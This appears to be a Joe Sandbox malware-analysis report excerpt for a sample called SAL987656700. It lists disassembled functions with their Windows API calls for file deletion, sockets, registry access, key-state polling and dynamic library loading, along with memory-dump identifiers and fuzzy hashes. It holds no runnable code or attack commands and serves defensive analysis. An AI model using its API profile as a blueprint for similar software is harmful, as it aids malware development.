                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 145871493-1355242751
                                      • Opcode ID: 399e58cb0f18ba77265622733d773200383ac2615eef1977439cdb376e1fc474
                                      • Instruction ID: c8922bf6e51064f6bc0c6dde0f824cda70919d78cf2076d08943fefd26c71d26
                                      • Opcode Fuzzy Hash: 399e58cb0f18ba77265622733d773200383ac2615eef1977439cdb376e1fc474
                                      • Instruction Fuzzy Hash: E0D0C2327DA6226746322B246C08DCB2A18FF81B253458110B804E2110CF20CD01D2D0
                                      Function 008F2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008F2C05
                                      • DeleteFileW.KERNEL32(?), ref: 008F2C87
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008F2C9D
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008F2CAE
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008F2CC0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: File$Delete$Copy
                                      • String ID:
                                      • API String ID: 3226157194-0
                                      • Opcode ID: 79c59fb5c4e4fa50c5578a3112074133c67ef71fbd90d7dabfcbc8552a11822d
                                      • Instruction ID: 73a1b0f7daa3d859930960c3b6a8a3bfadd319eb9133963d8ad6b18fdf1b7177
                                      • Opcode Fuzzy Hash: 79c59fb5c4e4fa50c5578a3112074133c67ef71fbd90d7dabfcbc8552a11822d
                                      • Instruction Fuzzy Hash: 13B12F71D0011DABDF15EBA8CC85EEEBB7DFF49354F1040A6F609E6151EA309A448F62
                                      Function 00901C60 Relevance: 7.8, APIs: 5, Instructions: 298networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 00901DC0
                                      • WSAGetLastError.WS2_32 ref: 00901DF2
                                      • htons.WS2_32(?), ref: 00901EDB
                                      • inet_ntoa.WS2_32(?), ref: 00901E8C
                                        • Part of subcall function 008E39E8: _strlen.LIBCMT ref: 008E39F2
                                        • Part of subcall function 00903224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,008FEC0C), ref: 00903240
                                      • _strlen.LIBCMT ref: 00901F35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                      • String ID:
                                      • API String ID: 3203458085-0
                                      • Opcode ID: f7af78d0fe8e1bf00f528fc0ebd9adcf7bbe56b18867ed24569ec74f044816d8
                                      • Instruction ID: b8c90348f759f6d2e6cee8374e4ba00ea24a231901f46866f703e3bd75482bbf
                                      • Opcode Fuzzy Hash: f7af78d0fe8e1bf00f528fc0ebd9adcf7bbe56b18867ed24569ec74f044816d8
                                      • Instruction Fuzzy Hash: 5CB1B071204341AFD724EF28C885E2A7BA9FF85318F54894CF5569B2E2DB31ED41CB92
                                      Function 0090A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 0090A427
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0090A435
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0090A468
                                      • CloseHandle.KERNEL32(?), ref: 0090A63D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                      • String ID:
                                      • API String ID: 3488606520-0
                                      • Opcode ID: 7010d7cc4c9249fd37a4d87618ff6fcbcded71d3195c184c3af687065fe97f44
                                      • Instruction ID: 02cbe102863686fd486a20cdc8e650ab57499780be37faaa707428da84d77f5b
                                      • Opcode Fuzzy Hash: 7010d7cc4c9249fd37a4d87618ff6fcbcded71d3195c184c3af687065fe97f44
                                      • Instruction Fuzzy Hash: 39A12D716043019FE720EF28D886B2AB7E5BF84714F14885DF55ADB2D2DAB1EC418B92
                                      Function 008BBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00923700), ref: 008BBB91
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0095121C,000000FF,00000000,0000003F,00000000,?,?), ref: 008BBC09
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00951270,000000FF,?,0000003F,00000000,?), ref: 008BBC36
                                      • _free.LIBCMT ref: 008BBB7F
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008BBD4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                      • String ID:
                                      • API String ID: 1286116820-0
                                      • Opcode ID: d9bb8367f56242c593550c0c2d99dcc3575e75d35afdbf39220f054e026a2ef1
                                      • Instruction ID: 2855b1db777479de6f3234ceb57f1b5f8153d76ea48bca3abeb5b70f77628104
                                      • Opcode Fuzzy Hash: d9bb8367f56242c593550c0c2d99dcc3575e75d35afdbf39220f054e026a2ef1
                                      • Instruction Fuzzy Hash: 4451C571904209AFCB14EF699C81AEEBBB8FF45360F10466AE464D7391EBB09E409B51
                                      Function 008EE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008ECF22,?), ref: 008EDDFD
                                        • Part of subcall function 008EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008ECF22,?), ref: 008EDE16
                                        • Part of subcall function 008EE199: GetFileAttributesW.KERNEL32(?,008ECF95), ref: 008EE19A
                                      • lstrcmpiW.KERNEL32(?,?), ref: 008EE473
                                      • MoveFileW.KERNEL32(?,?), ref: 008EE4AC
                                      • _wcslen.LIBCMT ref: 008EE5EB
                                      • _wcslen.LIBCMT ref: 008EE603
                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 008EE650
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                      • String ID:
                                      • API String ID: 3183298772-0
                                      • Opcode ID: f6903d5061d315f654839b38645268120887e1dea35eccb5f3d1559969c0a806
                                      • Instruction ID: d8ca24c22ef8667d0e205baa139412aeb5fb58040a41c071ff8401899896b320
                                      • Opcode Fuzzy Hash: f6903d5061d315f654839b38645268120887e1dea35eccb5f3d1559969c0a806
                                      • Instruction Fuzzy Hash: 115192B24087855BD724EB94C8819DB73ECFF86344F00492EF589D3191EE74A288875B
                                      Function 0090B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 0090C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090B6AE,?,?), ref: 0090C9B5
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090C9F1
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA68
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0090BAA5
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0090BB00
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0090BB63
                                      • RegCloseKey.ADVAPI32(?,?), ref: 0090BBA6
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0090BBB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                      • String ID:
                                      • API String ID: 826366716-0
                                      • Opcode ID: df18b877afdb7299d9dc51b37db583e138fcd6771b183d299315269abf65bd2c
                                      • Instruction ID: 42274e5a8ec4417dcd3e5cb94af18f1ff20c7ead78c019d35961fc7724330a17
                                      • Opcode Fuzzy Hash: df18b877afdb7299d9dc51b37db583e138fcd6771b183d299315269abf65bd2c
                                      • Instruction Fuzzy Hash: 8E618271208241EFD714DF54C490E6ABBE9FF84308F54895DF4998B2A2DB31ED45CB92
                                      Function 008E8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 008E8BCD
                                      • VariantClear.OLEAUT32 ref: 008E8C3E
                                      • VariantClear.OLEAUT32 ref: 008E8C9D
                                      • VariantClear.OLEAUT32(?), ref: 008E8D10
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008E8D3B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType
                                      • String ID:
                                      • API String ID: 4136290138-0
                                      • Opcode ID: 50f6a7896ffe9ba71da1e0b2e83b73c51e90ae8e943e60aae46985f89f34f031
                                      • Instruction ID: 8742e53dc738a3d858bf3ceaa87e22ca074afae47975202e7031bd49804483ce
                                      • Opcode Fuzzy Hash: 50f6a7896ffe9ba71da1e0b2e83b73c51e90ae8e943e60aae46985f89f34f031
                                      • Instruction Fuzzy Hash: 455178B5A00659EFCB10CF69C884AAAB7F9FF8A314B158559F909DB350E730E911CF90
                                      Function 008F8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008F8BAE
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 008F8BDA
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008F8C32
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008F8C57
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008F8C5F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String
                                      • String ID:
                                      • API String ID: 2832842796-0
                                      • Opcode ID: 372da094ad1849b397539452a5d1080d5d06e20547c36076062181656ebecdfb
                                      • Instruction ID: 418e3d48a4d15a8a7d71b5965388b15870dd19be2996dc4fa36a0e665d90c43c
                                      • Opcode Fuzzy Hash: 372da094ad1849b397539452a5d1080d5d06e20547c36076062181656ebecdfb
                                      • Instruction Fuzzy Hash: 2C513935A00219DFCB04EF68C880A6DBBF5FF48314F088458E959AB362CB31ED41CBA1
                                      Function 00908EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00908F40
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00908FD0
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00908FEC
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00909032
                                      • FreeLibrary.KERNEL32(00000000), ref: 00909052
                                        • Part of subcall function 0089F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,008F1043,?,7529E610), ref: 0089F6E6
                                        • Part of subcall function 0089F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,008DFA64,00000000,00000000,?,?,008F1043,?,7529E610,?,008DFA64), ref: 0089F70D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                      • String ID:
                                      • API String ID: 666041331-0
                                      • Opcode ID: 5fd80c3f5bde4f0bd1f514fac78386f9228960e6f8f540f6e062f1687b231cfe
                                      • Instruction ID: a175a42a655f9c48a9bec03a7c8c2fd256fe542e67b0e58d33640b3ea171f5c4
                                      • Opcode Fuzzy Hash: 5fd80c3f5bde4f0bd1f514fac78386f9228960e6f8f540f6e062f1687b231cfe
                                      • Instruction Fuzzy Hash: 77515E75605205DFC715EF68C4848AEBBF5FF49314B0880A8E945AB3A2DB31ED86CB91
                                      Function 00916B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00916C33
                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00916C4A
                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00916C73
                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,008FAB79,00000000,00000000), ref: 00916C98
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00916CC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Long$MessageSendShow
                                      • String ID:
                                      • API String ID: 3688381893-0
                                      • Opcode ID: db285aae2c299a13c0852dc376c5edc3b0a6051df1e853477ea9f3f90e840978
                                      • Instruction ID: 66eafde6eca739873107babcdaaf1862526ebb6ba89c8c1345d741eed0e4cb22
                                      • Opcode Fuzzy Hash: db285aae2c299a13c0852dc376c5edc3b0a6051df1e853477ea9f3f90e840978
                                      • Instruction Fuzzy Hash: 4F41D475F08108AFD724CF28CD58FE97BA9EB09350F154268FAD5A72E0C371AD81DA80
                                      Function 008B2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 489f4ca71329019d007f0680620dbaf208071838c674fa3c483fc9916826bf0d
                                      • Instruction ID: 9e1af4d23ca34fd631c809238e997f77117ac6794f1a34821b441b294ec2cb5a
                                      • Opcode Fuzzy Hash: 489f4ca71329019d007f0680620dbaf208071838c674fa3c483fc9916826bf0d
                                      • Instruction Fuzzy Hash: 0D41D272A00604AFCB24EF7CC881A9DB7A5FF89314F1545A8E615EB356DB31AD01DB81
                                      Function 0089912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00899141
                                      • ScreenToClient.USER32(00000000,?), ref: 0089915E
                                      • GetAsyncKeyState.USER32(00000001), ref: 00899183
                                      • GetAsyncKeyState.USER32(00000002), ref: 0089919D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      • Opcode ID: ee8702d199572d6454501e066b28efe187950abb947a57a67ba48581775112ca
                                      • Instruction ID: cf573b5afdac447a8c42d3940911f5fefa675892e7c08093da0794af897d1bb6
                                      • Opcode Fuzzy Hash: ee8702d199572d6454501e066b28efe187950abb947a57a67ba48581775112ca
                                      • Instruction Fuzzy Hash: 3A417F71A0861AFBDF05AF68C844BEEB774FB05324F24831AE465E32D0D7346990DB91
                                      Function 008F3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetInputState.USER32 ref: 008F38CB
                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 008F3922
                                      • TranslateMessage.USER32(?), ref: 008F394B
                                      • DispatchMessageW.USER32(?), ref: 008F3955
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008F3966
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                      • String ID:
                                      • API String ID: 2256411358-0
                                      • Opcode ID: 5d6d92dec09034e96ff2785e93d2d506f632dd8fcc077928a23e17b4b6bccfd3
                                      • Instruction ID: eb826702e7151211e9173103de345a52a93795de08f4514f945199ca6a403df5
                                      • Opcode Fuzzy Hash: 5d6d92dec09034e96ff2785e93d2d506f632dd8fcc077928a23e17b4b6bccfd3
                                      • Instruction Fuzzy Hash: 7D31F77071834A9FEB35CB35D818BB63FA8FB02345F04056DE662C21A0E3F49A85DB11
